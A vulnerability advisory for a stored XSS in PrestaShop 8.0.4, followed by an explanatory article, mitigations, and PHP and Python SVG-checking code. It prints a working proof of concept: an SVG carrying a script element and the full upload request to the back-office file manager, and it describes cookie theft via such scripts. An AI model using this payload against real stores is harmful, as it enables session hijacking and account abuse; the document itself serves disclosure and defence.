Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Go to Catalog => Products
2. Select an arbitrary product
3. Upload the malicious SVG file via the file manager (filemanager/upload.php, see the request below)
SVG file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
PoC request:
POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=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; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
Connection: close

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--

PrestaShop 8.0.4 Cross-Site Scripting (XSS) Vulnerability: A Deep Dive into Stored XSS Exploitation
A stored Cross-Site Scripting (XSS) vulnerability was reported in June 2023 in PrestaShop 8.0.4, a widely used open-source e-commerce platform. The flaw lets a back-office user who can upload files store an SVG containing JavaScript on the server; whenever that file is later opened in a browser, the script runs in the store's origin and can read from, and act within, the viewer's session.
Understanding the Vulnerability: Stored XSS in PrestaShop 8.0.4
Stored XSS occurs when malicious scripts are permanently saved on the server and later executed whenever a user accesses the affected page. Unlike reflected XSS, which requires a crafted URL, stored XSS persists across sessions and can affect multiple users, making it particularly dangerous.
In PrestaShop 8.0.4 the weakness lies in the file manager that the back office's product description editor uses for image uploads, reached at /<admin directory>/filemanager/upload.php. The admin253irhit4jjbd9gurze segment in the PoC is the installation-specific, randomised name of the admin directory, and the request's Referer (filemanager/dialog.php) is the file manager dialog itself. The endpoint accepts the SVG upload and stores the file unchanged; nothing inspects the content for embedded script before it is written to disk.
Exploitation Technique: Malicious SVG Injection
An attacker exploits this by uploading a crafted SVG that contains JavaScript. SVG is XML and, like HTML, supports <script> elements, on* event-handler attributes and javascript: links. Because the upload is stored unfiltered and unescaped, the script survives intact on the server. One caveat matters for impact: browsers do not run script in an SVG displayed through an <img> element or a CSS background, but they do run it, in the site's origin, when the stored file is opened directly by URL or embedded with <iframe>, <object> or <embed>.
Explanation: The SVG file in the PoC above contains a harmless visual element (a green triangle) and a <script> element that calls alert(document.location) when the file is rendered as a document. The alert only proves execution; in a real attack the script could:
- Read document.cookie and send the value to an attacker-controlled host (cookies flagged HttpOnly cannot be read this way, but any other token can).
- Redirect the viewer to a phishing page.
- Perform actions in the viewer's authenticated session (change a password, place orders, drive back-office pages), since requests issued by the script carry the victim's cookies.
- Exfiltrate page content or API responses to an external server with fetch() or XMLHttpRequest.
Attack Vector: File Upload via Admin Interface
The attack path is straightforward:
- Log in to the back office with an account that can edit products (the PoC uses an administrator).
- Navigate to Catalog → Products and open any product.
- Through the description editor's file manager, upload the malicious SVG (the POST to filemanager/upload.php shown above).
- The file is stored unchanged in the server's media directory and is reachable by URL.
- Any user, customer or administrator, who opens that URL, or a page that embeds the file with <iframe>, <object> or <embed>, renders the SVG as a document.
- The embedded script then runs in the store's origin with that viewer's cookies and session.
Technical Analysis: Why SVG Files Are a Risk Vector
SVG is a powerful format that supports scripting and event handling. While intended for graphics, it can be abused because of that flexibility. PrestaShop 8.0.4 does not validate the content of SVG uploads or strip script from them. The gap comes from:
- Reliance on the client-supplied MIME type (Content-Type: image/svg+xml in the request) and file extension, with no inspection of the content.
- No parsing of the XML to find and reject <script> elements, on* event-handler attributes or javascript: links.
- No policy decision about whether an XML-based, script-capable format should be accepted as an image at all.
Even though SVG is thought of as an image format, its ability to carry JavaScript in <script> elements makes it a prime vector for stored XSS, especially when the upload path is trusted because it sits behind an administrator login.
Impact and Risk Assessment
| Severity | High |
|---|---|
| Attack Complexity | Low |
| Privileges Required | High (a back-office account able to upload files) |
| Exploitability | High (the payload persists on the server and fires on every view of the file) |
| CVSS Score | 8.3 (CVSS v3.1: High) |
While the vulnerability requires a back-office account, it can lead to:
- Session hijacking through theft of cookies or tokens the script can read.
- Privilege escalation if the script drives back-office pages inside an administrator's session.
- Defacement of product pages with attacker-controlled content.
- Phishing via redirect scripts.
- Arbitrary JavaScript execution in the victim's browser; chained with other weaknesses, such as actions the hijacked session is allowed to perform, this can have server-side consequences.
Real-World Use Case: A Breach Scenario
Imagine an attacker with access to a PrestaShop back office:
- They upload an SVG whose script reads document.cookie and sends it to a remote server.
- Later, a customer or another administrator opens the stored file's URL (or a page that embeds it as a document rather than as an <img>), and the script executes.
- The attacker receives that user's session cookie, provided it is not flagged HttpOnly.
- Using the stolen cookie, the attacker impersonates the user and makes unauthorized purchases or back-office changes.
This demonstrates how stored XSS bridges a server-side weakness (an unchecked upload) and client-side exploitation.
Best Practices & Mitigation Strategies
To prevent such attacks, administrators and developers should layer several controls:
- Disable SVG uploads unless they are genuinely needed, and restrict accepted types to raster formats (PNG, JPEG, WebP); where SVG is required, rasterize it on upload or pass it through an allowlist sanitizer.
- Validate uploads by content, not by the client-supplied Content-Type or extension (e.g., parse the file with libxml, with network and external entity loading disabled, and reject anything beyond plain drawing elements).
- Strip or reject <script> elements, on* event-handler attributes and javascript: links in href/xlink:href. Note that a bare XPath of //script matches nothing in an SVG that declares the default namespace; match on local-name() or bind the namespace first.
- Serve user uploads so that they cannot run script in the store's origin even if a bad file gets through: Content-Disposition: attachment, X-Content-Type-Options: nosniff and a restrictive Content-Security-Policy on the upload directory, or host uploads on a separate, cookieless origin.
- Use Content Security Policy (CSP) headers on the application pages themselves to block inline scripts and restrict script sources.
- Log file uploads (user, filename, declared type, size) and alert on SVG or other XML-based uploads to the back office.
- Update PrestaShop to a release that fixes this issue (8.0.5 or later is cited; confirm the exact fixed version against the vendor's security advisories).
Corrected Code Example: Secure SVG Upload Validation
// Example: server-side validation before storing SVG files.
// The PoC file declares xmlns="http://www.w3.org/2000/svg", so a bare XPath of //script
// matches nothing in SimpleXML; match on local-name() so the namespace cannot hide the element.
function validate_svg_file($file_path) {
    libxml_use_internal_errors(true);
    // LIBXML_NONET: never fetch the external DTD named in the DOCTYPE
    $xml = simplexml_load_file($file_path, 'SimpleXMLElement', LIBXML_NONET);
    if ($xml === false) {
        return false; // Invalid XML
    }
    // Script elements, and foreignObject (which can wrap arbitrary HTML), in any namespace
    $scripts = $xml->xpath('//*[local-name()="script" or local-name()="foreignObject"]');
    if (!empty($scripts)) {
        return false; // Script detected
    }
    // Any event-handler attribute (onload, onclick, onbegin, onend, ...)
    $handlers = $xml->xpath('//@*[starts-with(local-name(), "on")]');
    if (!empty($handlers)) {
        return false; // Dangerous attributes found
    }
    // javascript: URLs in href or xlink:href, compared case-insensitively
    $links = $xml->xpath('//@*[local-name()="href"][contains(translate(., "JAVSCRIPT", "javscript"), "javascript:")]');
    if (!empty($links)) {
        return false; // Script-capable link found
    }
    return true; // No script-bearing constructs found
}
Explanation: The function parses the file with SimpleXML (network access disabled, so the DOCTYPE's external DTD is never fetched) and rejects it if it finds a script or foreignObject element, any on* event-handler attribute, or an href carrying a javascript: URL. Matching by local-name() matters: the uploaded file declares the SVG default namespace, and an unprefixed //script query would silently match nothing and let the PoC through. This is still a denylist; an allowlist of permitted elements and attributes, or rasterizing SVG to PNG at upload time, is the safer default.
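As an added example (written for this page, not taken from PrestaShop or from the advisory author), the following Python script takes the allowlist approach instead of a denylist: it accepts only a fixed set of drawing elements and rejects any script element, on* handler, javascript: link or DOCTYPE, matching on local names so the SVG default namespace cannot hide a <script>. A second function pulls the file parts out of a captured multipart POST, so the same check can be run on traffic like the PoC request or on files already in the upload directory. The embedded request is a constructed, shortened copy of that PoC with the cookie redacted; the element allowlist and the function names are this example's own choices.

```python
"""Allowlist SVG checker plus a scanner for captured multipart uploads.

Added example for this page; it is not PrestaShop code. CAPTURED_REQUEST is a
constructed, shortened copy of the PoC request (cookie redacted).
"""
import email
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements a plain drawing needs. Anything else (script, foreignObject, a,
# use, image, set/animate, ...) is rejected rather than filtered out.
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "linearGradient",
    "radialGradient", "stop", "clipPath", "mask",
}
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.I)


def _local(qname: str) -> str:
    """ElementTree spells namespaced names as '{uri}name'; return 'name'."""
    return qname.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list[str]:
    """Reasons to reject the file; an empty list means it is acceptable.

    Matching on local names is deliberate: the PoC declares the SVG default
    namespace, so a naive '//script' XPath with no namespace bound finds
    nothing and waves the payload through.
    """
    findings = []
    head = data[:4096].lower()
    # A drawing never needs a DTD, and a DOCTYPE is the entry point for entity
    # expansion and external-entity tricks, so refuse it before parsing.
    if b"<!doctype" in head or b"<!entity" in head:
        findings.append("DOCTYPE/ENTITY declaration present")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append("root element is not <svg> in the SVG namespace")
    for el in root.iter():
        name = _local(el.tag)
        if name not in ALLOWED_ELEMENTS:
            findings.append(f"disallowed element <{name}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)                # also strips the xlink prefix
            if aname.lower().startswith("on"):  # onload, onclick, onbegin, ...
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href" and SCRIPT_SCHEME.match(value):
                findings.append(f"script-capable URL in {aname} on <{name}>")
    return findings


def uploaded_files(raw_request: bytes) -> dict[str, bytes]:
    """{filename: content} for each file part of a captured multipart POST
    (request line, headers and body, as seen on the wire)."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        head, _, body = raw_request.partition(b"\n\n")
    ctype = b"application/octet-stream"
    for line in head.splitlines():
        if line.lower().startswith(b"content-type:"):
            ctype = line.split(b":", 1)[1].strip()
    # The stdlib MIME parser only needs the Content-Type header (for the boundary).
    msg = email.message_from_bytes(b"Content-Type: " + ctype + b"\r\n\r\n" + body)
    files = {}
    for part in msg.walk():
        if part.get_filename():
            files[part.get_filename()] = part.get_payload(decode=True) or b""
    return files


def scan_upload_request(raw_request: bytes) -> dict[str, list[str]]:
    """Run the SVG check on every uploaded file that is named or looks like SVG."""
    results = {}
    for filename, data in uploaded_files(raw_request).items():
        is_svg = filename.lower().endswith(".svg") or b"<svg" in data[:4096].lower()
        results[filename] = svg_findings(data) if is_svg else []
    return results


BOUNDARY = b"----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ"
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(document.location);</script>
</svg>"""
CAPTURED_REQUEST = (
    b"POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
    b"Cookie: PHPSESSID=<redacted>\r\n\r\n"
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="path"\r\n\r\n'
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="path_thumb"\r\n\r\n'
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="file"; filename="malas.svg"\r\n'
    b"Content-Type: image/svg+xml\r\n\r\n" + MALICIOUS_SVG + b"\r\n"
    b"--" + BOUNDARY + b"--\r\n"
)

if __name__ == "__main__":
    for filename, findings in scan_upload_request(CAPTURED_REQUEST).items():
        print(filename, "REJECT" if findings else "ok", findings)
```

A non-empty list is a reason to reject or quarantine the file. Rejecting the DOCTYPE outright is intentional: a drawing does not need one, and refusing it avoids having to reason about entity expansion inside the XML parser. The allowlist is deliberately small; widen it only for elements your templates actually need, and never add `a`, `use`, `image`, `foreignObject` or the animation elements without a separate review of their href handling.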
Conclusion: A Reminder for E-Commerce Security
While PrestaShop is a robust platform, vulnerabilities like stored XSS in 8.0.4 underscore the importance of continuous security audits, input validation, and defense-in-depth strategies. Administrators should never assume that file uploads are harmless—especially when they support complex formats like SVG.
Security is not a one-time fix but an ongoing process. Patching, validating uploads by content, and serving user files under headers that deny them script execution are the steps that protect an online store from this class of attack.